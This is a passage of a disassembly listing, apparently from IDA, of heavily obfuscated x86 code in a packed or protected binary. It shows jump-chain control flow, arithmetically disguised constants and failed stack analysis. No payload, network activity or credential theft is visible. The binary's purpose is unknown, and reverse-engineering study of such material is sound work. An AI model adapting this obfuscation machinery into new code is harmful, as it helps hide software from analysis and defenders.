loc_43B3AB: ; CODE XREF: sub_444AA3-12FDj
call sub_459923
loc_43B3B0: ; CODE XREF: sub_43DD32+1A85Bj
jmp sub_444E04
; END OF FUNCTION CHUNK FOR sub_444AA3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_43B3B5: ; CODE XREF: sub_444273+104DEj
jmp loc_43E995
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452653
loc_43B3BA: ; CODE XREF: sub_452653:loc_43FB80j
jz loc_456509
jmp loc_4453E0
; END OF FUNCTION CHUNK FOR sub_452653
; ---------------------------------------------------------------------------
loc_43B3C5: ; CODE XREF: ut7h7i2x:0043A0B2j
; ut7h7i2x:00454A3Dj
xor esi, 9FD4B8FFh
xchg esi, [esp]
lea eax, [ebp-2C8h]
push eax
push esi
push 92E6389Dh
jmp loc_454D56
; ---------------------------------------------------------------------------
loc_43B3E0: ; CODE XREF: ut7h7i2x:00454557j
sub edx, 43D3F6C6h
rol eax, 0Ch
jbe sub_4432F5
jg loc_440FF1
jmp loc_43CF58
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B43D
loc_43B3FA: ; CODE XREF: sub_44B43D-B213j
; sub_44B43D:loc_455922j
sub edx, 5A7D32ECh
add edx, 4AC01C3Dh
call sub_44764B
loc_43B40B: ; CODE XREF: ut7h7i2x:0045A896j
jmp nullsub_229
; END OF FUNCTION CHUNK FOR sub_44B43D
; ---------------------------------------------------------------------------
loc_43B410: ; CODE XREF: ut7h7i2x:00455FBDj
jmp locret_451AA8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443816
loc_43B415: ; CODE XREF: sub_443816+FD57j
jmp loc_448E71
; END OF FUNCTION CHUNK FOR sub_443816
; ---------------------------------------------------------------------------
loc_43B41A: ; CODE XREF: ut7h7i2x:0043B2E0j
cmp ecx, eax
jmp loc_441B08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CFB6
loc_43B421: ; CODE XREF: sub_43CFB6+6855j
xor edx, esi
pop esi
mov eax, edx
xor ebx, 4A318B9Fh
adc edx, 83BA7595h
jmp loc_4415BE
; END OF FUNCTION CHUNK FOR sub_43CFB6
; ---------------------------------------------------------------------------
loc_43B437: ; CODE XREF: ut7h7i2x:loc_44584Bj
jl loc_4538DC
; START OF FUNCTION CHUNK FOR sub_45292B
loc_43B43D: ; CODE XREF: sub_45292B+Cj
jmp sub_44EB88
; END OF FUNCTION CHUNK FOR sub_45292B
; ---------------------------------------------------------------------------
mov ebx, [ecx]
sub esi, 0AF3A1A17h
jmp loc_4538DC
; ---------------------------------------------------------------------------
loc_43B44F: ; CODE XREF: ut7h7i2x:loc_4507FBj
sub eax, esi
pop esi
mov edx, [esp]
push esi
mov esi, eax
xchg esi, [esp]
push offset sub_43F62C
jmp loc_44B71B
; ---------------------------------------------------------------------------
rol ebp, 17h
jmp sub_43D38F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A45
loc_43B46D: ; CODE XREF: sub_443A45+1137Bj
jnz loc_44B420
jmp loc_451351
; END OF FUNCTION CHUNK FOR sub_443A45
; ---------------------------------------------------------------------------
jmp ds:off_41D0B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_43B47E: ; CODE XREF: sub_453A91-1A1C2j
; sub_446BFE+1Bj ...
jnz loc_452F28
xchg eax, [esp+0]
mov edx, eax
jmp loc_449FC4
; END OF FUNCTION CHUNK FOR sub_448321
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_391. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43B48F: ; CODE XREF: ut7h7i2x:0043FBA0j
xor ebx, 4AA2E84Dh
popf
jmp loc_45A2EB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FC60
loc_43B49B: ; CODE XREF: sub_44FC60:loc_4581CEj
pop eax
and eax, 6A46F4F3h
add eax, 6F98375Ch
add eax, ebp
add eax, 8E67B47Fh
push ecx
mov ecx, eax
xchg ecx, [esp+0]
jmp loc_44B6B8
; END OF FUNCTION CHUNK FOR sub_44FC60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44081E
loc_43B4BB: ; CODE XREF: sub_44081E:loc_450F87j
add eax, 10F817BEh
jmp loc_43E4BC
; END OF FUNCTION CHUNK FOR sub_44081E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44928D
loc_43B4C6: ; CODE XREF: sub_44928Dj
push edi
push 0A3324E7Fh
xchg edx, [esp+8+var_8]
mov edi, edx
loc_43B4D1: ; CODE XREF: ut7h7i2x:loc_447FD2j
pop edx
or edi, 7D0BB260h
js loc_44E388
loc_43B4DE: ; CODE XREF: ut7h7i2x:00452025j
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_44928D
; =============== S U B R O U T I N E =======================================
sub_43B4E3 proc near ; DATA XREF: sub_449744+A5FCo
; FUNCTION CHUNK AT 0044A592 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004532F6 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004593E4 SIZE 0000001D BYTES
jns loc_44A592
sub al, 99h
push 41B84C47h
pop edx
sub edx, 238A383Ch
add edx, 45E0A114h
xor edx, 398FE534h
jmp loc_4593E4
sub_43B4E3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43B508: ; CODE XREF: ut7h7i2x:loc_43A691j
jz loc_43E853
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43B50E: ; CODE XREF: sub_439BF8:loc_446A0Aj
jmp loc_4461BC
; END OF FUNCTION CHUNK FOR sub_439BF8
; =============== S U B R O U T I N E =======================================
sub_43B513 proc near ; DATA XREF: sub_43A92F+16FBo
; FUNCTION CHUNK AT 0043DE5B SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0043E41C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D711 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004533AF SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00457DEC SIZE 0000000B BYTES
cmp al, 0A4h
loc_43B515: ; CODE XREF: ut7h7i2x:0043F1DBj
jz loc_43DE56
jmp loc_457DEC
sub_43B513 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_43B520: ; CODE XREF: sub_448321:loc_449FC4j
pop eax
mov eax, [esp-4+arg_0]
push edx
call sub_44C273
push 0DE12AD97h
xchg ebp, [esp+4+var_4]
mov eax, ebp
pop ebp
jmp loc_4396CF
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AC40
loc_43B53A: ; CODE XREF: sub_44AC40+8j
sub ebx, 8C01E338h
rol ebx, 1Bh
test ebx, 800h
jmp loc_43FA41
; END OF FUNCTION CHUNK FOR sub_44AC40
; ---------------------------------------------------------------------------
loc_43B54E: ; CODE XREF: ut7h7i2x:00452254j
and edx, 0F4A05FB4h
add edx, 2C21B140h
mov [edx], eax
pop edx
lea eax, nullsub_16
push offset sub_44D42A
jmp loc_448805
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_43B56D: ; CODE XREF: sub_43AA94+C7CEj
jnz loc_44DB32
jmp loc_43EDFB
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
dd 0B3938A0Fh, 49E90000h
db 31h, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451F39
loc_43B583: ; CODE XREF: sub_451F39-D4F1j
jno loc_4458B7
loc_43B589: ; CODE XREF: ut7h7i2x:loc_453724j
xor eax, eax
mov [ebp-8], eax
; END OF FUNCTION CHUNK FOR sub_451F39
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_43B58E: ; CODE XREF: sub_44EC11-76A0j
; sub_44EC11+Bj
jnb loc_44DC84
push 5E96DD2Fh
jmp loc_4515F7
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_43B59E: ; CODE XREF: sub_455060-9FD7j
jz loc_44B519
jmp loc_43CD49
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
xchg ebp, [ecx]
jmp loc_44AF4A
; =============== S U B R O U T I N E =======================================
sub_43B5B0 proc near ; CODE XREF: ut7h7i2x:00439DCBj
; ut7h7i2x:0045A139p
; FUNCTION CHUNK AT 00456080 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004594EB SIZE 00000018 BYTES
xchg eax, [esp+0]
pop eax
call sub_453D8B
mov edx, 92B16BD7h
call sub_44ED9F
jmp loc_456080
sub_43B5B0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_43B5C8: ; CODE XREF: sub_43DBEC:loc_43E360j
jz loc_44B5B7
jmp loc_4424AA
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
loc_43B5D3: ; CODE XREF: ut7h7i2x:0044DC94j
popf
; =============== S U B R O U T I N E =======================================
sub_43B5D4 proc near ; CODE XREF: sub_444851+77CEp
; FUNCTION CHUNK AT 004397C4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043AAC4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044484C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448648 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A210 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00455088 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A185 SIZE 0000001D BYTES
xchg esi, [esp+0]
pop esi
xor esi, 0A40D2260h
sub eax, esi
pop esi
push ebx
pushf
jmp loc_44484C
sub_43B5D4 endp
; ---------------------------------------------------------------------------
loc_43B5E8: ; CODE XREF: ut7h7i2x:00445B4Fj
push 3508728h
pop edx
rol edx, 5
xor edx, 3C5678D0h
add eax, edx
pop edx
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_43B5FA: ; CODE XREF: sub_43AED9:loc_4573E2j
jmp loc_43D631
; END OF FUNCTION CHUNK FOR sub_43AED9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CD08
loc_43B5FF: ; CODE XREF: sub_43CD08+7j
mov eax, [esp+0]
push eax
mov eax, edx
call sub_448215
loc_43B60A: ; DATA XREF: sub_450645-A603o
add eax, ebp
add eax, 5BBC30ADh
call sub_43D643
loc_43B617: ; CODE XREF: sub_457EF4+6j
jmp loc_442B57
; END OF FUNCTION CHUNK FOR sub_43CD08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_43B61C: ; CODE XREF: sub_43D021+1AE17j
jmp loc_44F6F2
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43B621: ; CODE XREF: sub_439BF8+10995j
jmp loc_440F18
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446073
loc_43B626: ; CODE XREF: sub_446073:loc_445B02j
jmp loc_44B52F
; END OF FUNCTION CHUNK FOR sub_446073
; ---------------------------------------------------------------------------
loc_43B62B: ; CODE XREF: ut7h7i2x:004445B7j
jmp loc_43B085
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CBC
loc_43B630: ; CODE XREF: sub_448CBC+E2DDj
pop edi
push 0D041D98Bh
pop eax
sub eax, 0A44E2968h
add eax, 0D44FF7ADh
jmp loc_44DF99
; END OF FUNCTION CHUNK FOR sub_448CBC
; ---------------------------------------------------------------------------
loc_43B648: ; CODE XREF: ut7h7i2x:00446383j
pop esi
or esi, 0F9FD4242h
and esi, 0C81C24B7h
sub esi, 2412505Bh
rol esi, 1Ah
; START OF FUNCTION CHUNK FOR sub_44937E
loc_43B65E: ; CODE XREF: sub_44937E:loc_4435D9j
add esi, 5DB1AA40h
mov [esi], eax
pop esi
jmp loc_454D66
; END OF FUNCTION CHUNK FOR sub_44937E
; ---------------------------------------------------------------------------
push ebx
push 0FA8B3989h
pop ebx
rol ebx, 12h
loc_43B676: ; CODE XREF: ut7h7i2x:00450BA5j
sub ebx, 93EBC056h
add ebx, 0AE05A67Eh
mov [ebx], eax
pop ebx
jmp loc_44A874
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_43B68A: ; CODE XREF: sub_444029:loc_459EA2j
add eax, 9C0E8EE4h
mov eax, [eax]
mov dx, [eax+2]
mov eax, [ebp-14h]
jmp loc_4440ED
; ---------------------------------------------------------------------------
loc_43B69E: ; CODE XREF: sub_444029:loc_456812j
mov eax, [ebp-24h]
test byte ptr [eax+1], 80h
jnz loc_4402C3
jmp loc_43E69C
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
loc_43B6B0: ; CODE XREF: ut7h7i2x:00448038j
cmp edi, 5A756B0Ch
jmp loc_44967B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_255. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_43B6BC: ; CODE XREF: sub_44C791-309Fj
jmp loc_457DE2
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_43B6C1: ; CODE XREF: sub_4433C5:loc_452072j
jz loc_4445CF
jmp loc_44C1BD
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
mov edi, 0B7CD338h
jmp loc_444271
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CAF4
loc_43B6D6: ; CODE XREF: sub_43CAF4:loc_445C5Cj
jz loc_44BD37
jmp loc_43BCCA
; END OF FUNCTION CHUNK FOR sub_43CAF4
; ---------------------------------------------------------------------------
loc_43B6E1: ; CODE XREF: ut7h7i2x:loc_44FAA9j
push edi
push 0F20DDBB4h
pop edi
rol edi, 11h
add edi, 48961BF5h
xchg edi, [esp]
pushf
call sub_43ADDB
loc_43B6FA: ; CODE XREF: ut7h7i2x:00458C59j
mov eax, ecx
; =============== S U B R O U T I N E =======================================
sub_43B6FC proc near ; CODE XREF: ut7h7i2x:00442DC9p
; FUNCTION CHUNK AT 0043E580 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push eax
ror eax, 9
mov ds:dword_44A89C, eax
jmp loc_43E580
sub_43B6FC endp
; ---------------------------------------------------------------------------
loc_43B70F: ; CODE XREF: ut7h7i2x:0045199Fj
and edi, 20063B71h
add edi, 0E03BAF4Bh
mov [edi], eax
xchg edx, [esp]
mov edi, edx
jmp loc_4568C2
; =============== S U B R O U T I N E =======================================
sub_43B727 proc near ; DATA XREF: ut7h7i2x:loc_448BA9o
; FUNCTION CHUNK AT 0044BA6C SIZE 00000005 BYTES
push ebx
push 0A233800h
pop ebx
sub ebx, 91CF41B1h
xor ebx, 0A43D3C55h
add ebx, 23D307E6h
mov [ebx], eax
pop ebx
jmp loc_44BA6C
sub_43B727 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44092D
loc_43B748: ; CODE XREF: sub_44092D:loc_458F55j
sub esi, 9D7CC00Dh
cmp esi, 0C2F0F6DBh
jmp loc_455D95
; END OF FUNCTION CHUNK FOR sub_44092D
; ---------------------------------------------------------------------------
jmp loc_439374
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4402A5
loc_43B75E: ; CODE XREF: sub_4402A5+6j
jb loc_44C18B
call sub_44E2C4
test al, al
jz loc_442DB8
jmp loc_453754
; END OF FUNCTION CHUNK FOR sub_4402A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_43B776: ; CODE XREF: sub_4408C2+1542j
jnz loc_43F335
jmp loc_444505
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
loc_43B781: ; CODE XREF: ut7h7i2x:0044090Dj
mov ds:dword_444420, edx
; START OF FUNCTION CHUNK FOR sub_4583C4
loc_43B787: ; CODE XREF: ut7h7i2x:0044810Fj
; sub_4583C4+6j
xchg eax, edx
push ecx
push 96B1C3FDh
pop ecx
and ecx, 7189BC36h
or ecx, 0CB373CDDh
jmp loc_451F2E
; END OF FUNCTION CHUNK FOR sub_4583C4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_251. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450645
loc_43B7A1: ; CODE XREF: sub_450645-14263j
jnb loc_43E860
sub eax, 63E3A9B7h
ror ebx, 0Ch
and edi, 3215635Dh
loc_43B7B6: ; CODE XREF: sub_450645:loc_4537F3j
push 0FB790CFEh
pop eax
add eax, 3AD89E3h
jmp loc_43AFBC
; END OF FUNCTION CHUNK FOR sub_450645
; =============== S U B R O U T I N E =======================================
sub_43B7C7 proc near ; CODE XREF: sub_459043j
; DATA XREF: sub_459036+3o
call sub_44092D
push eax
push esi
call sub_44C5D9
sub_43B7C7 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_43B7D3: ; CODE XREF: sub_440CEC:loc_4430EAj
jmp loc_44BC51
; END OF FUNCTION CHUNK FOR sub_440CEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4392AE
loc_43B7D8: ; CODE XREF: sub_4392AE+Fj
jmp sub_449216
; END OF FUNCTION CHUNK FOR sub_4392AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_43B7DD: ; CODE XREF: sub_44865D:loc_43AEBEj
mov eax, [ebp+8]
push eax
push eax
push 1BDB33AFh
pop eax
rol eax, 0Ch
jb loc_44D624
push ecx
jmp loc_448C3A
; END OF FUNCTION CHUNK FOR sub_44865D
; =============== S U B R O U T I N E =======================================
sub_43B7F7 proc near ; CODE XREF: ut7h7i2x:0043C38Aj
; sub_43E766+4151p
arg_0 = dword ptr 4
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 0043B1A6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043E3B7 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043E504 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F3EC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043F6CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441066 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441CAF SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00444772 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445F81 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445F98 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446B86 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446D93 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446F71 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449195 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004492AC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00449B4C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BEC1 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044DEE7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044E50A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00452739 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454451 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00454D4C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457019 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457936 SIZE 00000012 BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, [eax+18h]
dec eax
call sub_453E14
loc_43B804: ; CODE XREF: ut7h7i2x:0044DF62j
jmp loc_446D93
sub_43B7F7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43B809: ; CODE XREF: ut7h7i2x:0044208Fj
jmp loc_447047
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_43B80E: ; CODE XREF: sub_44CE09-CAD5j
jmp sub_45854D
; END OF FUNCTION CHUNK FOR sub_44CE09
; ---------------------------------------------------------------------------
locret_43B813: ; CODE XREF: ut7h7i2x:loc_43B994j
retn
; ---------------------------------------------------------------------------
locret_43B814: ; CODE XREF: ut7h7i2x:004412DEj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4545FB
loc_43B815: ; CODE XREF: sub_4545FB+16j
jmp loc_45597A
; END OF FUNCTION CHUNK FOR sub_4545FB
; ---------------------------------------------------------------------------
loc_43B81A: ; CODE XREF: ut7h7i2x:00444453j
jmp loc_445B7E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45002D
loc_43B81F: ; CODE XREF: sub_45002D-EB66j
jmp nullsub_370
; END OF FUNCTION CHUNK FOR sub_45002D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DA21
loc_43B824: ; CODE XREF: sub_43DA21+3j
jmp loc_451A6F
; END OF FUNCTION CHUNK FOR sub_43DA21
; ---------------------------------------------------------------------------
loc_43B829: ; CODE XREF: ut7h7i2x:00456DCEj
and ecx, 9E1D843Ch
mov [esi], ebp
jge loc_44BD82
jmp loc_456678
; =============== S U B R O U T I N E =======================================
sub_43B83C proc near ; CODE XREF: sub_44BDF1+4D76p
; sub_44668A+FAD2j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00452C21 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457BE0 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00458A77 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00459C62 SIZE 00000005 BYTES
jnz sub_44E5DC
jmp loc_452C21
sub_43B83C endp
; =============== S U B R O U T I N E =======================================
sub_43B847 proc near ; DATA XREF: ut7h7i2x:004508CAo
; FUNCTION CHUNK AT 0044382D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044475B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444CAA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00447498 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448D8F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044AAC2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B010 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004506E0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00452264 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453695 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004554A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045687E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045982E SIZE 0000000B BYTES
mov eax, [ebp-10h]
test eax, eax
jle loc_456678
jmp loc_452264
sub_43B847 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_227. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_80. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov eax, 24CC2B1h
call sub_43D45D
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_43B863: ; CODE XREF: sub_4529E0-550j
jmp loc_43CB97
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
loc_43B868: ; DATA XREF: sub_444BA4o
call sub_43B873
jmp ds:off_41D0AC
; =============== S U B R O U T I N E =======================================
sub_43B873 proc near ; CODE XREF: ut7h7i2x:loc_43B868p
; sub_43B873+AC78j ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043955F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043E5FD SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044557F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004464E8 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00449059 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00450338 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452417 SIZE 00000005 BYTES
js loc_4464F0
pop edx
mov eax, [esp-4+arg_0]
push edx
call sub_44C273
push 0D450D1DCh
jmp loc_43E5FD
sub_43B873 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xor edx, eax
jmp sub_43A1DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_43B894: ; CODE XREF: sub_43F1B2+9F60j
jz loc_4547BC
loc_43B89A: ; CODE XREF: sub_4503C3-7614j
jmp loc_444926
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
mov ebp, 0D9DDB248h
push 76C70A5Dh
jmp loc_4547B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_43B8AE: ; CODE XREF: sub_457A66-1125Cj
not edi
jmp loc_440D34
; ---------------------------------------------------------------------------
loc_43B8B5: ; CODE XREF: sub_457A66-12BD0j
sub al, 99h
push 5F66E276h
pop edx
xor edx, 0FAAB8DE2h
rol edx, 6
or edx, 49A3D9D4h
jmp loc_45235C
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
push esi
push 7A1CC396h
pop esi
or esi, 0C8F9D664h
add esi, 543F982h
mov [esi], eax
pop esi
lea eax, nullsub_8
jmp loc_44616B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_370. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E54
loc_43B8F3: ; CODE XREF: sub_459E54-150E1j
jmp loc_4598E7
; END OF FUNCTION CHUNK FOR sub_459E54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_43B8F8: ; CODE XREF: sub_457A66-1DD60j
mov ebp, 4385959Ah
jmp loc_453CF2
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_43B902: ; CODE XREF: sub_4489DF+5FD4j
ror ebp, 12h
popf
jmp loc_44702B
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FD5
loc_43B90B: ; CODE XREF: sub_449FD5+4A0Aj
jz loc_442416
jmp loc_443763
; END OF FUNCTION CHUNK FOR sub_449FD5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447167
loc_43B916: ; CODE XREF: sub_447167:loc_457EEFj
xchg esi, [esp+4+var_4]
jmp loc_43AD92
; END OF FUNCTION CHUNK FOR sub_447167
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446258
loc_43B91E: ; CODE XREF: sub_446258+3373j
or esi, 6D515D37h
jmp loc_44DE59
; END OF FUNCTION CHUNK FOR sub_446258
; ---------------------------------------------------------------------------
mov eax, 3CC6743Ch
push edx
push 2576A177h
xor edx, 0EEE60535h
jmp loc_442CE1
; ---------------------------------------------------------------------------
loc_43B93F: ; CODE XREF: ut7h7i2x:004401A8j
jz loc_4534C4
jg locret_43E6E5
not ebx
ror edx, 1Dh
jmp loc_4534C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439D5C
loc_43B955: ; CODE XREF: sub_439D5C:loc_44EE19j
xor ebx, 0DD3FA52h
jmp loc_439579
; END OF FUNCTION CHUNK FOR sub_439D5C
; ---------------------------------------------------------------------------
loc_43B960: ; CODE XREF: ut7h7i2x:00456DAEj
add ebx, 0AE3A1211h
; START OF FUNCTION CHUNK FOR sub_441765
loc_43B966: ; CODE XREF: sub_441765:loc_44F936j
xor ebx, 9B848FEh
xor eax, ebx
pop ebx
jmp loc_44AD4D
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
loc_43B974: ; CODE XREF: ut7h7i2x:00445AF2j
mov ebx, 81F3DE3h
; =============== S U B R O U T I N E =======================================
sub_43B979 proc near ; CODE XREF: sub_441C8F+9A1Fp
xchg eax, [esp+0]
pop eax
mov edx, [ebp-14h]
add eax, [edx+20h]
xor edx, edx
call sub_4566F0
loc_43B98A: ; CODE XREF: sub_4528A5+7j
jmp sub_453D8B
sub_43B979 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_43B98F: ; CODE XREF: sub_457A66-7215j
jmp loc_442C17
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
loc_43B994: ; CODE XREF: ut7h7i2x:00446B42j
jmp locret_43B813
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_43B999: ; CODE XREF: sub_442B3B+9C3Dj
mov eax, [eax-18h]
and eax, 7
mov [ebp-0Ch], eax
cmp dword ptr [ebp-10h], 0
jmp loc_456444
; END OF FUNCTION CHUNK FOR sub_442B3B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_270. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EDD8
loc_43B9AC: ; CODE XREF: sub_43EDD8-1D97j
jmp loc_43FB03
; END OF FUNCTION CHUNK FOR sub_43EDD8
; =============== S U B R O U T I N E =======================================
